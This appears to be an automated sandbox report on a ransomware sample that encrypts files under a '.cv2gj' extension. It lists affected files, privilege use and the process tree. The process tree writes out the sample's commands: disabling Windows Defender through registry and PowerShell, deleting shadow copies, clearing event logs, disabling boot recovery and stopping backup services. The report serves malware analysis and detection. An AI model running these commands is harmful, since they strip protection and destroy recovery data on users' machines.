| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\GRAPH_COL.HXT.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\PeopleWideTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\bf_16x11.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\xaml\onenote\CaptureUIStyles.xaml | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\8577_32x32x32.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxCalendarSplashLogo.scale-150.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\cross.png.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\GenericMailMediumTile.scale-400.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pl-pl\ui-strings.js.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_GAAAABgAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\currency.data.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2017.125.40.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraMedTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\69.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-36_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-72_altform-colorize.png | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core_2.3.0.v20131211-1531.jar.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_OAAAADgAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface.nl_zh_4.4.0.v20140623020002.jar.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AgAAAAIAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019VL_MAK_AE-pl.xrm-ms.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe
"C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe"
C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_1323b" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_1323b" /y
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_1323b" start= disabled
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SYSTEM32\notepad.exe
notepad.exe C:\n8pw_HOW_TO_DECRYPT.txt
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe"
C:\Windows\system32\PING.EXE
ping.exe -n 5 127.0.0.1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 20.101.57.9:123 | time.windows.com | udp |
Files
memory/3704-115-0x0000000000000000-mapping.dmp
memory/3280-116-0x0000000000000000-mapping.dmp
memory/1524-117-0x0000000000000000-mapping.dmp
memory/1296-118-0x0000000000000000-mapping.dmp
memory/572-119-0x0000000000000000-mapping.dmp
memory/1164-120-0x0000000000000000-mapping.dmp
memory/2360-121-0x0000000000000000-mapping.dmp
memory/2088-122-0x0000000000000000-mapping.dmp
memory/2248-123-0x0000000000000000-mapping.dmp
memory/3680-124-0x0000000000000000-mapping.dmp
memory/3336-125-0x0000000000000000-mapping.dmp
memory/4036-126-0x0000000000000000-mapping.dmp
memory/840-127-0x0000000000000000-mapping.dmp
memory/2572-128-0x0000000000000000-mapping.dmp
memory/1416-129-0x0000000000000000-mapping.dmp
memory/584-130-0x0000000000000000-mapping.dmp
memory/2528-131-0x0000000000000000-mapping.dmp
memory/2552-132-0x0000000000000000-mapping.dmp
memory/1668-133-0x0000000000000000-mapping.dmp
memory/2236-134-0x0000000000000000-mapping.dmp
memory/1320-135-0x0000000000000000-mapping.dmp
memory/1224-136-0x0000000000000000-mapping.dmp
memory/4012-137-0x0000000000000000-mapping.dmp
memory/1376-138-0x0000000000000000-mapping.dmp
memory/1656-139-0x0000000000000000-mapping.dmp
memory/2024-140-0x0000000000000000-mapping.dmp
memory/1980-141-0x0000000000000000-mapping.dmp
memory/2200-142-0x0000000000000000-mapping.dmp
memory/3940-143-0x0000000000000000-mapping.dmp
memory/3232-144-0x0000000000000000-mapping.dmp
memory/352-145-0x0000000000000000-mapping.dmp
memory/1272-146-0x0000000000000000-mapping.dmp
memory/2096-147-0x0000000000000000-mapping.dmp
memory/3672-148-0x0000000000000000-mapping.dmp
memory/3688-149-0x0000000000000000-mapping.dmp
memory/3588-150-0x0000000000000000-mapping.dmp
memory/2040-151-0x0000000000000000-mapping.dmp
memory/896-152-0x0000000000000000-mapping.dmp
memory/3048-153-0x0000000000000000-mapping.dmp
memory/3864-154-0x0000000000000000-mapping.dmp
memory/3684-155-0x0000000000000000-mapping.dmp
memory/3900-156-0x0000000000000000-mapping.dmp
memory/1164-157-0x0000000000000000-mapping.dmp
memory/788-158-0x0000000000000000-mapping.dmp
memory/1540-159-0x0000000000000000-mapping.dmp
memory/1824-160-0x0000000000000000-mapping.dmp
memory/3312-161-0x0000000000000000-mapping.dmp
memory/3676-162-0x0000000000000000-mapping.dmp
memory/380-163-0x0000000000000000-mapping.dmp
memory/748-164-0x0000000000000000-mapping.dmp
memory/868-165-0x0000000000000000-mapping.dmp
memory/1088-166-0x0000000000000000-mapping.dmp
memory/3564-167-0x0000000000000000-mapping.dmp
memory/3976-168-0x0000000000000000-mapping.dmp
memory/2592-169-0x0000000000000000-mapping.dmp
memory/1784-170-0x0000000000000000-mapping.dmp
memory/2128-171-0x0000000000000000-mapping.dmp
memory/3004-172-0x0000000000000000-mapping.dmp
memory/2872-173-0x0000000000000000-mapping.dmp
memory/1640-174-0x0000000000000000-mapping.dmp
memory/3180-175-0x0000000000000000-mapping.dmp
memory/3692-176-0x0000000000000000-mapping.dmp
memory/3580-177-0x0000000000000000-mapping.dmp
memory/1800-178-0x0000000000000000-mapping.dmp
memory/2820-179-0x000001CAA2130000-0x000001CAA2132000-memory.dmp
memory/2820-180-0x000001CAA2130000-0x000001CAA2132000-memory.dmp
memory/2820-181-0x000001CAA2130000-0x000001CAA2132000-memory.dmp
memory/2820-182-0x000001CAA2130000-0x000001CAA2132000-memory.dmp
memory/2820-183-0x000001CAA2130000-0x000001CAA2132000-memory.dmp
memory/2820-184-0x000001CABBF20000-0x000001CABBF42000-memory.dmp
memory/2820-185-0x000001CAA2130000-0x000001CAA2132000-memory.dmp
memory/2820-186-0x000001CAA2130000-0x000001CAA2132000-memory.dmp
memory/2820-187-0x000001CAA2130000-0x000001CAA2132000-memory.dmp
memory/2820-188-0x000001CAA2130000-0x000001CAA2132000-memory.dmp
memory/2820-189-0x000001CABE1E0000-0x000001CABE256000-memory.dmp
memory/2820-190-0x000001CAA2130000-0x000001CAA2132000-memory.dmp
memory/2820-194-0x000001CABBF80000-0x000001CABBF82000-memory.dmp
memory/2820-195-0x000001CABBF83000-0x000001CABBF85000-memory.dmp
memory/2820-196-0x000001CABBF86000-0x000001CABBF88000-memory.dmp
memory/2820-217-0x000001CAA2130000-0x000001CAA2132000-memory.dmp
memory/2820-218-0x000001CAA2130000-0x000001CAA2132000-memory.dmp
memory/3904-220-0x00000201660F0000-0x00000201660F2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8592ba100a78835a6b94d5949e13dfc1 |
| SHA1 | 63e901200ab9a57c7dd4c078d7f75dcd3b357020 |
| SHA256 | fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c |
| SHA512 | 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3 |
memory/3904-221-0x00000201660F0000-0x00000201660F2000-memory.dmp
memory/3904-222-0x00000201660F0000-0x00000201660F2000-memory.dmp
memory/3904-223-0x00000201660F0000-0x00000201660F2000-memory.dmp
memory/3904-224-0x00000201660F0000-0x00000201660F2000-memory.dmp
memory/3904-225-0x0000020102200000-0x0000020102222000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 68311e554f61eb47783d489b1dabc7eb |
| SHA1 | 3397ee99dc13e75d1322cd0d8f277056d571a438 |
| SHA256 | db82f980256350fa8507fc22e10d5e5afb5a0cd69d8e9ff917849ef6a501ded8 |
| SHA512 | d924fa8613b31491592fc7cbe29aded8cdf211b6f64ec702265b38d0cd67c889672275370665c9c2c01e9ebab5cac68cd8fec4a9d058a7f4bfbb0b4dbfc797d1 |
memory/3904-227-0x00000201660F0000-0x00000201660F2000-memory.dmp
memory/3904-229-0x00000201660F0000-0x00000201660F2000-memory.dmp
memory/3904-228-0x00000201660F0000-0x00000201660F2000-memory.dmp
memory/3904-230-0x00000201660F0000-0x00000201660F2000-memory.dmp
